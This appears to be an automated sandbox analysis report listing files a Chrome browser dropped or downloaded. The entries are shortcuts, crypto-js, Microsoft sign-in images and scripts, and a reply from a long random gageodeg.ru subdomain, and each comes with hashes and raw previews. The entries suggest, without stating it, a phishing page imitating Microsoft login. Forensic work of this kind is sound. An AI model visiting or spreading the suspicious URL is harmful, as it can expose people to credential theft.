                                                                        Preview:L..................F.@.. ...$+.,....|*6v.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I0Z.B....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.B....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V0Z.B....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V0Z.B..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V0Z.B...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............'.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2693
                                                                        Entropy (8bit):4.008238236242737
                                                                        Encrypted:false
                                                                        SSDEEP:48:8xzdST+9ssHLidAKZdA14tseh7sFiZUkmgqeh7sPlxy+BX:8x8WsWnfxy
                                                                        MD5:BBEE61FED9135426E9E9B7F3057E8272
                                                                        SHA1:A9E486F173CE78489DCA10F4A4FB60D3368960D3
                                                                        SHA-256:A9834D39F9A23EA9F1336BCE56406F8BB025E0A47A2C81CF012895D67CDB5231
                                                                        SHA-512:45287AB9F9C4DE1CB5120BC1C1A291CA10828F488F4DD67D6FF081F43BACE3A670E807F9FB453A77F3D20CAF7040965853B79B90444285445694BC19F34EF9E2
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I0Z.B....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.B....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V0Z.B....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V0Z.B..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............'.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 07:20:11 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2681
                                                                        Entropy (8bit):3.9945189611932035
                                                                        Encrypted:false
                                                                        SSDEEP:48:8EidST+9sjHLidAKZdA1vehDiZUkwqehNlxy+R:8EDWsYVxy
                                                                        MD5:2A7C1EB395BA673D483E56D0B8FA953C
                                                                        SHA1:9BE44AE24E616472E17934944653FD83A7B887C7
                                                                        SHA-256:8C9899BD3CE9ED92357B5FFC195716B27F177F0C9D8EA08B24C93926249ECEFB
                                                                        SHA-512:BE876BECF08881A7D7FBD6B13D28CDBC269FACCCCD23D853687F3E5CDC474C599DBBD8DC05DFFADA4141C80C3D63A935EC880002E1D54956A98F2FDB4A8379A0
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:L..................F.@.. ...$+.,....../v.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I0Z.B....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.B....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V0Z.B....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V0Z.B..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V0Z.B...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............'.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 07:20:11 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2681
                                                                        Entropy (8bit):3.982989136537627
                                                                        Encrypted:false
                                                                        SSDEEP:48:8widST+9sjHLidAKZdA1hehBiZUk1W1qehblxy+C:8wDWsI9hxy
                                                                        MD5:1DAF6C4B2DE66387C5891B001D7F9239
                                                                        SHA1:435E9F1F3B1725A268C3DDFC8ABE7CC8B87CECAF
                                                                        SHA-256:A5E305F3EFE1EEE7B66D99CBFC9A81A58267B2FEEEBC09E7054268C45CEDF36D
                                                                        SHA-512:0F7FB48612FB4EED86705E2C06ED776ACDBC57815438EBC14740AC867DD1FC5029D41CF1E8D7C879476C97F638C15A4731077B0F8397885A79EB0A1D26B82810
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:L..................F.@.. ...$+.,....&.:v.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I0Z.B....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.B....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V0Z.B....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V0Z.B..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V0Z.B...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............'.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 07:20:11 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2683
                                                                        Entropy (8bit):3.9954898016159515
                                                                        Encrypted:false
                                                                        SSDEEP:48:8cidST+9sjHLidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbFlxy+yT+:8cDWsmT/TbxWOvTbfxy7T
                                                                        MD5:3E715BD3CDD360E3E5F1E02FF8EC8E91
                                                                        SHA1:4D7187613CA43426DBDEE0ADD58AB518D9B22CCF
                                                                        SHA-256:ADB9E613519951DD51716887C92DA39DDBCFEE4938A2D83C6EF03C8D20E44521
                                                                        SHA-512:DE1102FA59AAF77E0800D71C9497136E9A40E60DD7A9CE2D59ADA5772EFACB04D8FFC04B24E6E79AF72F84CB4C16B63E2A01A553532990F5E816C55002733906
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:L..................F.@.. ...$+.,....:z%v.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I0Z.B....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z.B....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V0Z.B....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V0Z.B..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V0Z.B...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............'.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):48316
                                                                        Entropy (8bit):5.6346993394709
                                                                        Encrypted:false
                                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                        Category:downloaded
                                                                        Size (bytes):621
                                                                        Entropy (8bit):7.673946009263606
                                                                        Encrypted:false
                                                                        SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                        MD5:4761405717E938D7E7400BB15715DB1E
                                                                        SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                        SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                        SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                        Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (47520)
                                                                        Category:dropped
                                                                        Size (bytes):47521
                                                                        Entropy (8bit):5.3981340461317835
                                                                        Encrypted:false
                                                                        SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                        MD5:7C92EC9D1395055CE0405A32607C7291
                                                                        SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                        SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                        SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:1
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                        Category:downloaded
                                                                        Size (bytes):5525
                                                                        Entropy (8bit):7.961202222662501
                                                                        Encrypted:false
                                                                        SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                        MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                        SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                        SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                        SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                        Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):96
                                                                        Entropy (8bit):5.218997042938778
                                                                        Encrypted:false
                                                                        SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWd6Nk:NciczBdTFsJFoM+q62Nk
                                                                        MD5:9872BE83FA60DA999B65A3BD481731D3
                                                                        SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                                        SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                                        SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                        Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:downloaded
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://oyklhzam8qfhuphxxe6quntrnthjjp2djemp0sazasxbp2sqyq.gageodeg.ru/yeTaiyvoWfIoToESWgYLyIzyODLAMMBOZAAWVQZOPDTFIFVFPIOGGUZKZU
                                                                        Preview:1
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                        Category:dropped
                                                                        Size (bytes):621
                                                                        Entropy (8bit):7.673946009263606
                                                                        Encrypted:false
                                                                        SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                        MD5:4761405717E938D7E7400BB15715DB1E
                                                                        SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                        SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                        SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                        Category:dropped
                                                                        Size (bytes):3620
                                                                        Entropy (8bit):6.867828878374734
                                                                        Encrypted:false
                                                                        SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                        MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                        SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                        SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                        SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                        Category:dropped
                                                                        Size (bytes):35170
                                                                        Entropy (8bit):7.993096534744333
                                                                        Encrypted:true
                                                                        SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                        MD5:171A4DD9400708B88724B57D62B24A6A
                                                                        SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                        SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                        SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                        Category:downloaded
                                                                        Size (bytes):17174
                                                                        Entropy (8bit):2.9129715116732746
                                                                        Encrypted:false
                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
